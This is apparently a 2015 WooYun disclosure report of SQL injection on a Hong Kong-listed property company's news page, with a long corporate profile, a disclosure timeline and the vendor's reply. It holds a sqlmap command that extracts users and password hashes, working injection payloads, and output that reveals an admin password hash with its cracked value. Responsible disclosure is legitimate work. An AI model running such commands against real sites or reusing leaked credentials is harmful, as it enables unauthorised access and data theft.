当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158103

漏洞标题: 实华发展有限公司主站存在SQL注射漏洞(管理密码)(香港地區)

相关厂商:实华发展有限公司

漏洞作者: 路人甲

提交时间:2015-12-04 17:35

修复时间:2016-01-21 18:22

公开时间:2016-01-21 18:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-04: 细节已通知厂商并且等待厂商处理中
2015-12-09: 厂商已经确认,细节仅向厂商公开
2015-12-19: 细节向核心白帽子及相关领域专家公开
2015-12-29: 细节向普通白帽子公开
2016-01-08: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

实华集团成立于1988年,企业注册资金1亿元人民币,总资产70亿元,是一家以地产开发为主业,多元化经营为辅业的综合性企业集团。经过十几年的艰苦奋斗,现已取得房地产开发国家一级资质、建筑施工国家一级资质,被多次被辽宁省建设厅评为“辽宁省房地产开发企业10强称号”、以及获得“品牌2010•中国房地产最佳品牌影响力百强企业”等荣誉称号。
实华集团经营分为四大业务板块,地产开发板块、商业物业板块、水力发电板块、药旅施工板块。
地产开发为主营业务板块,目前实华集团累计开发面积达800万平方米,项目集中辽宁省内沈阳、本溪、鞍山、本溪县、桓仁等地,目前在建项目13个,在建面积300万平米,储备地产项目8个。目前在本溪地区实现了全产品线开发,涵盖高档、中端、经济适用房、学区住宅、公寓等类型房屋。并在本溪市火车站前建有单体12万平米地标性商业建筑,在沈阳市和平区中山路建有200m高超甲级标准写字楼地标项目。未来地产业务将深耕辽宁及东三省地区,力争实现区域性快速发展。
商业物业管理板块,实华集团自持商业地产物业面积20余万平方米,酒店、百货商场、家居广场、办公楼、地下商场等类型。目前集团同美国沃尔玛公司、美国喜达屋集团、大商集团等国际知名企业达成合作,目前在建商业面积60万平方米,预计2017年自持运营商业面积将达到80万平米。其中在本溪市在建两家沃尔玛超市,计划2016年同时开业,并在本溪太子河畔在建150m高地标性福朋喜来登酒店,计划2018年开业。
水电板块,实华集团坚持多元化经营,利用清洁能源进行小水电开发,目前已发电电站3座,其中本溪两座、河北省一座,在建电站一座、储备一座,均位于吉林省集安市。计划2017年实现全部发电,预计总装机容量3万kw。
药旅施工板块,实华集团斥巨资开发辽宁桓仁桓龙湖万乐岛旅游度假景区,并于2006年投入运营。同时投资辽宁福源药业进行医药生产及医药研发。实华建安公司累计施工达500万平方米,为国家一级施工资质。
实华集团于2014年成功收购香港主板上市公司“升冈国际”,成为其控股股东,并于2014年10月将其更名为“实华发展”,作为未来业务发展重要平台。
资源有限、机遇无限,困难有限、办法无限。实华集团将努力拼搏、适应市场的激烈变化,不畏困难,努力为社会、为员工、为股东创造价值、利益、回报的最大化,为实现百年实华的目标而努力奋斗。

详细说明:

地址:http://**.**.**.**/news/NewsDetails.aspx?nid=10000377

$ python sqlmap.py -u "http://**.**.**.**/news/NewsDetails.aspx?nid=10000377" -p nid --technique=BE --output-dir=output --random-agent --batch  --no-cast --current-user --is-dba --users --passwords --count --search -C pass

漏洞证明:

---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=10000377 AND 8045=8045
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: nid=10000377 AND 9226=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(113)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (9226=9226) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(120)+CHAR(113)))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user: 'shihua'
current user is DBA: False
database management system users [1]:
[*] sa
database management system users password hashes:
[*] sa [1]:
password hash: NULL
columns LIKE 'pass' were found in the following databases:
Database: lnshihua
Table: mic_Admin
[1 column]
+----------+---------+
| Column | Type |
+----------+---------+
| password | varchar |
+----------+---------+
Database: lnshihua
Table: mic_Admin
[2 entries]
+---------------------------------------------+
| password |
+---------------------------------------------+
| 98BFE7780B3044EBA8560C4A35455A18 (admin007) |
| 98BFE7780B3044EBA8560C4A35455A18 (admin007) |
+---------------------------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-12-09 14:33

厂商回复:

雖然涉事機構提供香港分部聯絡/網站設於香港,經覆查後認為伺服器主要由內地人員管理,請聯絡 CNCERT 跟進。

最新状态:

暂无